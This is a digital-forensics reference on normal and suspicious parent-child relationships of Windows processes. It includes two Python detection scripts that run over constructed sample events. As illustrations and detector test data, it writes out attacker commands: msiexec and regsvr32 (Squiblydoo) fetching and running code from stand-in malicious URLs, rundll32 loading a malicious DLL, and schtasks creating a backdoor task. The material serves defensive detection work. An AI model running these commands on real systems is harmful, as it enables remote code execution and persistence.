DFIR-Notes

🔹 Windows System Processes

Understanding parent-child process relationships is crucial for system monitoring, malware analysis, and forensic investigations. Here are some important processes and their typical parent-child


1️⃣ System Idle Process (PID 0)

  • Parent: None (it is created by the kernel at boot)

  • Child: None (it never creates processes)

  • Purpose: Accounts for CPU time during which no other thread is runnable. It has one idle thread per logical processor, runs only the kernel's idle loop, and has no image file on disk, so it should never show an image path or a command line.

2️⃣ System Process (PID 4)

  • Parent: None (created by the kernel; listings show PPID 0)

  • Child: smss.exe (the only user-mode process it starts)

  • Purpose: Hosts kernel-mode system threads (driver worker threads, the memory manager's writer threads, and so on); the image behind it is the kernel itself (ntoskrnl.exe). It is always PID 4 and lives in session 0. Any other process reporting PPID 4 (a cmd.exe or powershell.exe whose parent is "System") points at a kernel-mode implant or at tooling that spoofs its parent.

3️⃣ smss.exe (Session Manager Subsystem)

  • Parent: System (PID 4)

  • Child: csrss.exe and wininit.exe (session 0); csrss.exe and winlogon.exe (each interactive session)

  • Purpose: Creates sessions, sets up paging files and the KnownDLLs list, runs autochk at boot, and launches the Win32 subsystem and logon processes.

  • Red Flags: More than one smss.exe that persists, a parent other than PID 4, or an image path outside C:\Windows\System32. Note that the master smss.exe starts a short-lived copy of itself for every session; that copy creates csrss.exe plus wininit.exe or winlogon.exe and then exits, so those three processes normally show a PPID that no longer resolves. That is expected, not an anomaly.

4️⃣ csrss.exe (Client/Server Runtime Subsystem)

  • Parent: smss.exe (the per-session instance, which has already exited, so the PPID no longer resolves)

  • Child: None on Windows 8 and later (on Windows 7 it spawns conhost.exe for console applications)

  • Purpose: User-mode side of the Win32 subsystem: tracks processes and threads, handled console windows on older versions, and drives shutdown. One instance runs per session, always from C:\Windows\System32. Killing it bug-checks the machine, so attackers imitate it (look-alike names, copies in other directories) rather than replace it.

5️⃣ wininit.exe (Windows Initialization Process)

  • Parent: smss.exe (session 0 instance, already exited)

  • Child: services.exe, lsass.exe (and lsm.exe on Windows 7)

  • Purpose: Initializes session 0 during boot and starts the Service Control Manager and the Local Security Authority. Exactly one instance should exist, in session 0, running from C:\Windows\System32.

6️⃣ services.exe (Service Control Manager)

  • Parent: wininit.exe

  • Child: Service processes (svchost.exe, spoolsv.exe, msiexec.exe /V, third-party service executables)

  • Purpose: Starts, stops and tracks Windows services. One instance, session 0, C:\Windows\System32. Every svchost.exe should have services.exe as its parent; an svchost.exe whose parent is anything else, or that runs from another directory, is a classic masquerade.

7️⃣ lsass.exe (Local Security Authority Subsystem)

  • Parent: wininit.exe

  • Child: None

  • Purpose: Authenticates logons, enforces the local security policy and issues access tokens. It holds credential material in memory, which is why it is the target of credential dumping.

  • Red Flags: A second lsass.exe, one that spawns child processes, one running outside C:\Windows\System32, or other processes opening handles to it with memory-read rights (Sysmon Event ID 10, ProcessAccess) all deserve immediate attention.

8️⃣ explorer.exe (Windows Explorer)

  • Parent: userinit.exe (which exits after starting the shell, so explorer.exe normally shows an unresolved PPID)

  • Child: cmd.exe, notepad.exe, chrome.exe (user-launched apps)

  • Purpose: Provides the desktop, taskbar, and file browsing interface. Runs from C:\Windows\explorer.exe (not System32), one instance per logged-on interactive user by default.

9️⃣ cmd.exe (Command Prompt)

  • Parent: explorer.exe (when opened by a user); also svchost.exe for scheduled tasks and wmiprvse.exe for WMI-initiated commands

  • Child: powershell.exe, whoami.exe, net.exe and anything else typed into it (plus conhost.exe on Windows 8 and later)

  • Purpose: Runs command-line instructions. A cmd.exe whose parent is an Office application, a browser, a web server worker process or another unexpected parent is one of the most reliable signs of exploitation.

🔟 powershell.exe

  • Parent: cmd.exe or explorer.exe for interactive use; svchost.exe (Task Scheduler) or wmiprvse.exe for automation

  • Child: Whatever the script launches (executables, further powershell.exe instances)

  • Purpose: Executes PowerShell scripts and commands. The parent alone says little; the command line says more: -EncodedCommand, -WindowStyle Hidden, -ExecutionPolicy Bypass, download cradles, and Office or script-host parents are the details worth checking.

1️⃣1️⃣ rundll32.exe

  • Parent: explorer.exe, cmd.exe, svchost.exe

  • Child: Usually none; the DLL's code runs inside rundll32.exe itself

  • Purpose: Loads a DLL and calls one of its exported functions (rundll32.exe <dll>,<entrypoint>). Legitimate use is common, so inspect the DLL path and the entry point rather than the process name.

1️⃣2️⃣ wmiprvse.exe (WMI Provider Host)

  • Parent: svchost.exe hosting the DcomLaunch service (not services.exe directly)

  • Child: Normally none

  • Purpose: Hosts the WMI providers that answer queries and method calls. When it spawns cmd.exe or powershell.exe, someone called Win32_Process.Create, the standard technique for remote execution and lateral movement over WMI.

1️⃣3️⃣ taskhost.exe / taskhostex.exe / taskhostw.exe

  • Parent: svchost.exe hosting the Task Scheduler service (Schedule)

  • Child: Normally none

  • Purpose: Generic host for scheduled tasks implemented as DLLs (taskhost.exe on Windows 7, taskhostex.exe on Windows 8, taskhostw.exe on Windows 10 and later). It is not a service host: a process by this name with parent services.exe, or running from outside System32, is suspect.
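
As an added example that is not part of the original page, the Python script below checks a process listing against the parent/child baseline described above: the expected parent for each process in the boot and logon chain, the parents that exit (the per-session smss.exe and userinit.exe) so that unresolved PPIDs are tolerated for their children, the processes that must run as a single instance, and the directory each image should load from. The `Proc` records are constructed sample data shaped like a pstree or tasklist export, not a capture from a real host; the two entries at the end are assumed anomalies built to trigger the checks.

```python
"""Added example (not from the DFIR-Notes page): check a process listing
against the boot/logon parent-child baseline described above."""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str   # image name, e.g. "lsass.exe"
    path: str   # full image path as reported by the listing


# Expected parent image name (lower-case) for the core chain.
EXPECTED_PARENT = {
    "smss.exe": "system",
    "csrss.exe": "smss.exe",
    "wininit.exe": "smss.exe",
    "winlogon.exe": "smss.exe",
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "svchost.exe": "services.exe",
    "userinit.exe": "winlogon.exe",
    "explorer.exe": "userinit.exe",
}

# Spawned by a parent that exits afterwards (per-session smss.exe,
# userinit.exe), so a PPID that no longer resolves is normal for these.
PARENT_EXITS = {"csrss.exe", "wininit.exe", "winlogon.exe", "explorer.exe"}

# Exactly one live instance is expected on a healthy host.
SINGLETONS = {"wininit.exe", "services.exe", "lsass.exe"}

SYSTEM32 = "c:\\windows\\system32\\"
SYSWOW64 = "c:\\windows\\syswow64\\"
ALLOWED_DIRS: Dict[str, Tuple[str, ...]] = {n: (SYSTEM32,) for n in EXPECTED_PARENT}
ALLOWED_DIRS["svchost.exe"] = (SYSTEM32, SYSWOW64)   # 32-bit services use the WOW64 copy
ALLOWED_DIRS["explorer.exe"] = ("c:\\windows\\",)     # the shell lives in C:\Windows


def check_processes(procs: List[Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, name, reason) for every baseline violation found."""
    by_pid = {p.pid: p for p in procs}
    counts: Dict[str, int] = {}
    findings: List[Tuple[int, str, str]] = []
    for p in procs:
        name = p.name.lower()
        counts[name] = counts.get(name, 0) + 1
        if name not in EXPECTED_PARENT:
            continue  # ordinary applications: their parent varies, nothing to baseline
        want = EXPECTED_PARENT[name]
        parent = by_pid.get(p.ppid)
        if parent is None:
            if name not in PARENT_EXITS:
                findings.append((p.pid, p.name, f"parent PID {p.ppid} not found; expected {want}"))
        elif parent.name.lower() != want:
            # For PARENT_EXITS entries the old PID may simply have been reused,
            # so this is a lead to verify rather than a verdict.
            note = " (PID reuse possible, verify)" if name in PARENT_EXITS else ""
            findings.append((p.pid, p.name, f"parent is {parent.name} (PID {parent.pid}), expected {want}{note}"))
        folder = p.path.lower().rsplit("\\", 1)[0] + "\\"
        if folder not in ALLOWED_DIRS[name]:
            findings.append((p.pid, p.name, f"image path {p.path} outside {' / '.join(ALLOWED_DIRS[name])}"))
    for name in SINGLETONS:
        if counts.get(name, 0) > 1:
            findings.append((0, name, f"{counts[name]} instances running, expected exactly 1"))
    return findings


# Constructed listing (not real telemetry). PPIDs 412, 596 and 1900 belong to
# the exited per-session smss.exe / userinit.exe instances and are absent on purpose.
SAMPLE = [
    Proc(4, 0, "System", ""),
    Proc(400, 4, "smss.exe", r"C:\Windows\System32\smss.exe"),
    Proc(520, 412, "csrss.exe", r"C:\Windows\System32\csrss.exe"),
    Proc(600, 412, "wininit.exe", r"C:\Windows\System32\wininit.exe"),
    Proc(640, 596, "winlogon.exe", r"C:\Windows\System32\winlogon.exe"),
    Proc(700, 600, "services.exe", r"C:\Windows\System32\services.exe"),
    Proc(720, 600, "lsass.exe", r"C:\Windows\System32\lsass.exe"),
    Proc(900, 700, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    Proc(2000, 1900, "explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(3000, 2000, "cmd.exe", r"C:\Windows\System32\cmd.exe"),
    # assumed anomalies: a fake lsass.exe and svchost.exe launched from cmd.exe
    Proc(4200, 3000, "lsass.exe", r"C:\Users\Public\lsass.exe"),
    Proc(4300, 3000, "svchost.exe", r"C:\Windows\Temp\svchost.exe"),
]

if __name__ == "__main__":
    for pid, name, reason in check_processes(SAMPLE):
        print(f"PID {pid:>5} {name:<14} {reason}")
```

On a live host the same checks run over the output of `Get-CimInstance Win32_Process` (ProcessId, ParentProcessId, Name, ExecutablePath) or a Volatility pstree export; the first ten records above produce no findings, the two anomalies produce a wrong-parent and a wrong-path finding each, and the duplicate lsass.exe additionally trips the single-instance rule.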

🔹 Additional Critical Windows Processes

1️⃣ winlogon.exe (Windows Logon Application)

  • Parent: smss.exe (the per-session instance, already exited)

  • Child: userinit.exe, LogonUI.exe, dwm.exe, fontdrvhost.exe

  • Purpose: Handles user login, logoff, the secure attention sequence (Ctrl+Alt+Del) and the lock screen; loads the user profile and starts userinit.exe.

  • Red Flags: Malware persists through the Winlogon registry values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (Shell, Userinit, and the Notify subkey on older versions), which winlogon.exe executes at logon. Also watch for winlogon.exe running from outside System32 or spawning children other than those listed above.


2️⃣ userinit.exe

  • Parent: winlogon.exe

  • Child: explorer.exe (or whatever shell the Winlogon\Shell value names), logon scripts

  • Purpose: Runs after login: applies logon scripts, restores network connections, starts the shell, then exits. Because it exits, explorer.exe is left with an unresolved PPID.

  • Red Flags: The Winlogon\Userinit value normally reads C:\Windows\system32\userinit.exe, (with the trailing comma). Extra entries appended to it, or a replaced binary, run attacker code at every logon.


3️⃣ explorer.exe

  • Parent: userinit.exe (already exited)

  • Child: User-launched apps (chrome.exe, notepad.exe, etc.)

  • Purpose: Handles the desktop, taskbar, and file browsing.

  • Red Flags: explorer.exe spawning cmd.exe or powershell.exe is normal for an interactive user, so judge the command line (encoded commands, hidden windows, download cradles) rather than the parent alone. More telling are an explorer.exe running from a path other than C:\Windows, more instances than logged-on users, or one whose parent is a live process instead of an exited userinit.exe.


4️⃣ msiexec.exe (Windows Installer)

  • Parent: explorer.exe (a user double-clicks an .msi) or services.exe (the Windows Installer service, started as msiexec.exe /V, which performs the elevated part of the install)

  • Child: Custom actions and installation helpers spawned by the package.

  • Purpose: Handles the installation of .msi files.

  • Red Flags: Attackers use msiexec.exe as a LOLBin (Living Off the Land Binary) to install a package silently straight from a URL (msiexec.exe /q /i http://malicious-url.com/malware.msi). An msiexec.exe command line containing http://, or an msiexec.exe launched by an Office application or script host, is worth a look.


5️⃣ wscript.exe & cscript.exe (Windows Script Host)

  • Parent: explorer.exe, cmd.exe; Office applications and Outlook when a user opens an attachment

  • Child: Whatever the script launches (powershell.exe, cmd.exe, downloaded executables).

  • Purpose: Both are the Windows Script Host and run VBScript and JScript (.vbs, .js, .wsf); wscript.exe is the windowed version, cscript.exe the console version.

  • Red Flags: A common first stage for phishing payloads: scripts in Temp, Downloads or AppData, a parent of winword.exe or outlook.exe, and scripts that download and execute a second stage. In "fileless" variants the script body is stored in the registry or a scheduled task and handed to the host on the command line instead of living in a .vbs on disk.


6️⃣ rundll32.exe

  • Parent: explorer.exe, cmd.exe, svchost.exe

  • Child: Usually none; the loaded DLL runs in-process.

  • Purpose: Executes an exported function of a DLL.

  • Red Flags: Attackers use it to run malicious DLLs (rundll32.exe malware.dll,Start). Check where the DLL lives (user-writable directories such as C:\Users\Public or Temp), whether the "DLL" carries an unusual extension, and whether the entry point is one Windows itself never calls.


7️⃣ regsvr32.exe (Microsoft Register Server)

  • Parent: cmd.exe, explorer.exe, msiexec.exe

  • Child: None; it loads the DLL in-process.

  • Purpose: Registers and unregisters COM DLLs by calling their DllRegisterServer / DllUnregisterServer exports.

  • Red Flags: Used in the Squiblydoo attack to bypass application whitelisting (regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll): the signed scrobj.dll fetches the scriptlet from the URL and executes it, while /n /u means DllRegisterServer is never called, so nothing is actually registered. A regsvr32.exe command line with /i: and a URL, or naming scrobj.dll, is the indicator.


8️⃣ conhost.exe (Console Window Host)

  • Parent: The console application it serves (cmd.exe, powershell.exe) on Windows 8 and later; csrss.exe on Windows 7

  • Child: None

  • Purpose: Provides console window support (drawing and input handling for console applications).

  • Red Flags: A conhost.exe running from an unusual location (C:\Users\Public\conhost.exe) rather than C:\Windows\System32, or one with no console application attached, is most likely malware borrowing the name.


9️⃣ dllhost.exe (COM Surrogate)

  • Parent: svchost.exe hosting the DcomLaunch service

  • Child: Normally none

  • Purpose: Hosts out-of-process COM objects on behalf of other processes; a legitimate instance carries the CLSID it hosts on its command line (dllhost.exe /Processid:{...}).

  • Red Flags: A dllhost.exe without the /Processid argument, running from outside System32, or with unexpected network connections is suspect. It is a favourite target for process hollowing and injection precisely because its presence on a system is unremarkable.


🔟 werfault.exe (Windows Error Reporting)

  • Parent: svchost.exe hosting the Windows Error Reporting service, or the crashing process itself, depending on the Windows version

  • Child: None (it collects the report and exits).

  • Purpose: Collects error reports and crash dumps for a faulting process, which it identifies through the -p <pid> argument on its command line.

  • Red Flags: Attackers can disable Windows Error Reporting so that crashes of their tooling leave no reports. Conversely, repeated WerFault.exe instances for lsass.exe or for security products point at crashes caused by tampering, and a WerFault.exe running from outside System32, or whose -p argument names no process that actually crashed, is a masquerade or an injection host.


1️⃣1️⃣ consent.exe (UAC Prompt)

  • Parent: svchost.exe hosting the Application Information service (Appinfo), not winlogon.exe

  • Child: None. The elevated process is created by that same Appinfo svchost.exe, so an elevated program's parent is svchost.exe rather than the process that asked for elevation.

  • Purpose: Displays the UAC consent or credential prompt on the secure desktop.

  • Red Flags: High-integrity processes appearing without consent.exe ever having run, or auto-elevating Windows binaries started with attacker-controlled registry values, indicate a UAC bypass, which takes an attacker from a filtered administrator token to full privileges without any prompt.


1️⃣2️⃣ taskeng.exe (Task Scheduler Engine)

  • Parent: svchost.exe hosting the Task Scheduler service (Schedule)

  • Child: The actions of the scheduled tasks it runs.

  • Purpose: Executes scheduled tasks on Windows 7 and 8. On Windows 10 and later, tasks are launched by taskhostw.exe or directly by the Schedule svchost.exe, so a taskeng.exe on a modern host is itself unusual.

  • Red Flags: Scheduled tasks are a standard persistence mechanism (schtasks.exe /create /tn Backdoor /tr "C:\malware.exe"). Review the task XML under C:\Windows\System32\Tasks, Security Event ID 4698 (task created, when object access auditing is enabled), and the Microsoft-Windows-TaskScheduler/Operational log.
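
The command-line red flags from this section, as an added example that is not code from the original page: each rule encodes one indicator described above (msiexec fetching from a URL, the regsvr32 Squiblydoo pattern, rundll32 loading a DLL from a user-writable path, script hosts launched by Office or from Temp/AppData, dllhost without /Processid, and schtasks creating a task outside trusted directories) and runs over a constructed list of process-creation events. The parents, paths and command lines in `SAMPLE_EVENTS` are made up for the demonstration, reusing the page's own example commands; the all-zero CLSID is a placeholder, and `TRUSTED_DIRS` and `OFFICE_APPS` are assumed lists to tune for your environment.

```python
"""Added example (not from the DFIR-Notes page): command-line red flags for
the LOLBins and helper processes described in this section."""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Event:
    parent: str    # parent image name
    image: str     # image name of the created process
    cmdline: str   # full command line of the created process


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}   # assumed list
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def first_arg(cmdline: str) -> str:
    """First argument after the program name, with surrounding quotes removed."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s+("([^"]*)"|\S+)', cmdline)
    if not m:
        return ""
    return m.group(2) if m.group(2) is not None else m.group(1)


def red_flags(ev: Event) -> List[str]:
    """Return the indicators from this section that the event matches."""
    image, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    flags: List[str] = []
    if image == "msiexec.exe" and re.search(r"\bhttps?://", cl):
        flags.append("msiexec.exe installing a package straight from a URL")
    if image == "regsvr32.exe" and "scrobj.dll" in cl and re.search(r"/i:\S*https?://", cl):
        flags.append("regsvr32.exe running a remote scriptlet via scrobj.dll (Squiblydoo)")
    if image == "rundll32.exe":
        dll = first_arg(cl).split(",")[0]
        # Bare names (shell32.dll,Control_RunDLL) resolve through the DLL search
        # order and are common in legitimate use; only explicit paths are judged here.
        if "\\" in dll and not dll.startswith(TRUSTED_DIRS):
            flags.append(f"rundll32.exe loading a DLL from a user-writable path: {dll}")
    if image in ("wscript.exe", "cscript.exe") and (
        parent in OFFICE_APPS or re.search(r"\\(temp|downloads|appdata)\\", cl)
    ):
        flags.append(f"script host started by {parent} or running a script from a user-writable path")
    if image == "dllhost.exe" and "/processid:" not in cl:
        flags.append("dllhost.exe without /Processid:{CLSID}; COM Surrogate normally has one")
    if image == "schtasks.exe" and "/create" in cl:
        m = re.search(r'/tr\s+("([^"]*)"|\S+)', cl)
        target = "" if not m else (m.group(2) if m.group(2) is not None else m.group(1))
        if target and not target.startswith(TRUSTED_DIRS):
            flags.append(f"schtasks.exe creating a task that runs {target}")
    return flags


def triage(events: List[Event]) -> List[Tuple[str, List[str]]]:
    """(image, flags) for every event that matched at least one rule, in input order."""
    return [(ev.image, red_flags(ev)) for ev in events if red_flags(ev)]


# Constructed process-creation events (not real telemetry). The commands are
# the page's own examples; the all-zero CLSID is a placeholder.
SAMPLE_EVENTS = [
    Event("explorer.exe", "msiexec.exe", "msiexec.exe /q /i http://malicious-url.com/malware.msi"),
    Event("cmd.exe", "regsvr32.exe", "regsvr32 /s /n /u /i:http://malicious.com/file.sct scrobj.dll"),
    Event("cmd.exe", "rundll32.exe", r"rundll32.exe C:\Users\Public\malware.dll,Start"),
    Event("winword.exe", "wscript.exe", r"wscript.exe C:\Users\alice\AppData\Local\Temp\invoice.vbs"),
    Event("cmd.exe", "dllhost.exe", "dllhost.exe"),
    Event("cmd.exe", "schtasks.exe", r'schtasks.exe /create /tn Backdoor /tr "C:\malware.exe"'),
    # benign look-alikes that must not fire
    Event("explorer.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    Event("svchost.exe", "dllhost.exe",
          r"C:\Windows\System32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"),
    Event("services.exe", "msiexec.exe", r"C:\Windows\System32\msiexec.exe /V"),
]

if __name__ == "__main__":
    for image, flags in triage(SAMPLE_EVENTS):
        print(f"{image:<14} {'; '.join(flags)}")
```

The six malicious events each produce one flag and the three benign look-alikes produce none; the rules deliberately key on the command line rather than the process name, because every binary in this section is also used legitimately many times a day on a normal host.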


Last updated 2 months ago